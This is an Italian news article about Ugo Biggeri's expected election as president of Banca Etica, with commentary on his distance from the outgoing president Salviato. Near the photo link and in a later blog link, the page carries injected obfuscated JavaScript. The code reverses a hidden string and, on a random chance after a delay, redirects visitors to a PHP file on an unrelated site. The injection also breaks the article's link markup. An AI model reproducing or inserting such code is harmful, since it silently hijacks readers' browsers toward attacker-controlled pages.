Banca Etica, sarà fiorentino il prossimo presidente. Biggeri candidato unico.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/02/ugobiggeri.jpg”>ugobiggeri
Ugo Biggeri, il prossimo presidente di Banca Etica

Sarà fiorentino il prossimo presidente di Banca Popolare Etica, il primo istituto di credito italiano che ha puntato su prodotti finanziari pensati per la società civile e su un’immagine etica dei propri comportamenti (è stata, ad esempio l’unica banca italiana a rifiutare di far rientrare capitali dall’estero tramite lo scudo fiscale).

A candidarsi alla presidenza è Ugo Biggeri, 44 anni, fiorentino, tra i fondatori della banca padovana (nella foto accanto) e qui nella nostra città conosciuto soprattutto per il suo impegno in Mani Tese e in Terra Futura.

La sua elezione è data per certa per l’assenza di altri candidati forti e, come ci dicono persone interne alla Banca con la garanzia dell’anonimato, per la continuità che può garantire all’attuale sistema di potere espresso dai soci fondatori.

Continuità, però, in qualche modo minata dallo stesso Biggeri quando prende le distanze dall’attuale presidenza Salviato. Biggeri sul blog personale introduce infatti la sua candidatura affermando: “La prima cosa che mi sento di chiedere a tutti è di ritornare a parlare di Banca Etica come di un NOI collettivo… […]”. Una frase che non può che essere letta come una forte presa di distanza dalla gestione personalistica dell’attuale presidente che ora, adeguandosi allo sport nazionale, entra in politica. Una gestione che nel passato è stata duramente attaccata anche da Alex Zanotelli.

Il passaggio culturale promesso è quello dall’IO salviatiano al NOI biggerese? In assenza di un confronto con altri candidati forti su cui esprimere un parere ce lo auguriamo con forza. Una frase che però arriva dopo anni di stretta collaborazione con l’organo di governo della Banca. Biggeri infatti è consigliere di amministrazione della Banca sin dall’inizio (1998). Per 12 anni ha votato e sostenuto le scelte del presidente uscente Fabio Salviato. Non ce ne voglia Ugo Biggeri, che conosciamo bene, anche per la sua vicinanza al progetto per l’istituzione di una Mag fiorentina nonostante la sua alterità al sistema bancario tradizionale, ma si tratta di un dato oggettivo che con trasparenza riportiamo.

Molti gli attestati di stima e di sostegno giunti al candidato Biggeri, ultimo in ordine di tempo quello del Coordinamento dei soci Italia centrale). Tra gli attenti osservatori delle dinamiche interne di Banca Etica non mancano però anche voci dissonanti, come quella dell’economista indipendente Condor Joe che sul suo blog analizza nel dettaglio il $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andidato-biggeri.html” target=”_blank”>programma di Biggeri e le modalità della candidatura.

Le elezioni sono previste per il 22 maggio a Padova.